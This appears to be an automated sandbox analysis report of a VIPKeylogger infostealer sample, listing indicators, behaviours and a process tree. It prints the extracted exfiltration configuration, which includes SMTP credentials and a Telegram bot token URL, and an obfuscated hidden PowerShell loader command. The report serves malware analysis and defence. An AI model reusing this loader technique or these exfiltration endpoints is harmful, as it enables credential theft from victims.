Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Jobation.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Jobation.ps1
Resource
win10v2004-20241007-en
General
-
Target
8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe
-
Size
661KB
-
MD5
8a9c90ba02c22e957bff42c02e6a4189
-
SHA1
4fe3080dbf75f99fa64dbf4e35f08560d4b2ef0c
-
SHA256
8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628
-
SHA512
de296476d773f0d61feb647376ee9f2131463bafb18243adcfd8ccd2e6b958ebf90294d24e09a1ef526ff8b25d8d6d291217766514d6cdd9f60afc8ed417bb50
-
SSDEEP
12288:vc5+AfopdAeHHn7XpjIW0ep9Rr2M/iTGYqWofv1zSFXMhuV+7+bY:vZAaAeHHlECyCiuW095ugcY
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.turktav.com - Port:
587 - Username:
[email protected] - Password:
)d!s~MV@X;!M - Email To:
[email protected]
https://api.telegram.org/bot7422104780:AAE8Q_pLcHk4fu5XIMEQar6JqYuE_1O_qCg/sendMessage?chat_id=7451270736
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2928 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 27 4912 msiexec.exe 29 4912 msiexec.exe 33 4912 msiexec.exe 35 4912 msiexec.exe 37 4912 msiexec.exe 40 4912 msiexec.exe 42 4912 msiexec.exe 57 4912 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 drive.google.com 27 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4912 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2928 powershell.exe 4912 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Gallinipper\gid.ful 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\thermels\dekaterendes.ini 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe File opened for modification C:\Windows\Fonts\choanosome\nitrosyl.ini 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe File opened for modification C:\Windows\resources\0409\storewide.Riv 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 4912 msiexec.exe 4912 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4912 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2928 powershell.exe Token: SeIncreaseQuotaPrivilege 2928 powershell.exe Token: SeSecurityPrivilege 2928 powershell.exe Token: SeTakeOwnershipPrivilege 2928 powershell.exe Token: SeLoadDriverPrivilege 2928 powershell.exe Token: SeSystemProfilePrivilege 2928 powershell.exe Token: SeSystemtimePrivilege 2928 powershell.exe Token: SeProfSingleProcessPrivilege 2928 powershell.exe Token: SeIncBasePriorityPrivilege 2928 powershell.exe Token: SeCreatePagefilePrivilege 2928 powershell.exe Token: SeBackupPrivilege 2928 powershell.exe Token: SeRestorePrivilege 2928 powershell.exe Token: SeShutdownPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeSystemEnvironmentPrivilege 2928 powershell.exe Token: SeRemoteShutdownPrivilege 2928 powershell.exe Token: SeUndockPrivilege 2928 powershell.exe Token: SeManageVolumePrivilege 2928 powershell.exe Token: 33 2928 powershell.exe Token: 34 2928 powershell.exe Token: 35 2928 powershell.exe Token: 36 2928 powershell.exe Token: SeDebugPrivilege 4912 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4912 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1592 wrote to memory of 2928 1592 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe 86 PID 1592 wrote to memory of 2928 1592 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe 86 PID 1592 wrote to memory of 2928 1592 8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe 86 PID 2928 wrote to memory of 4912 2928 powershell.exe 95 PID 2928 wrote to memory of 4912 2928 powershell.exe 95 PID 2928 wrote to memory of 4912 2928 powershell.exe 95 PID 2928 wrote to memory of 4912 2928 powershell.exe 95 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe"C:\Users\Admin\AppData\Local\Temp\8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Frustreringers=Get-Content -raw 'C:\Users\Admin\AppData\Local\Mixende\Klausuleringerne\Jobation.udk';$Brndes=$Frustreringers.SubString(53183,3);.$Brndes($Frustreringers)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4912
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
223KB
MD5ea6867f02c973c162bce9569b3e62a32
SHA1702f1e9bea0be45c56f8d7fa1b838cb6aedd30a1
SHA25603132d30bbf7bd4b58663587fc045f2e36cc0723b91ed9e5c6eaf6d9a4591012
SHA5129bb95a906e29b0d957c239d800c0263144c3468e73edc48c0285136501ae39b15a04ab7b4623eb9639a118573dd63e161759fd9f5a7518062ee4beca78107d0e
-
Filesize
51KB
MD5faace62892757e3f6b6bcdc07c3b75e0
SHA11b0bcaaaf1c6b3aeaee3a7eef36f0a1776fb654b
SHA2566492bacab0fd62ad56b0c444c325f727653725a87fc221e2bb6baf8d56490f89
SHA51212f0d38ee61532c33c3618525163ed79bb5e51d21cb0d3e35db98b1b4e1cbb42b3569682b2cdd869592c8649e6e83a49e777704980bb207d9790692e59682bbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82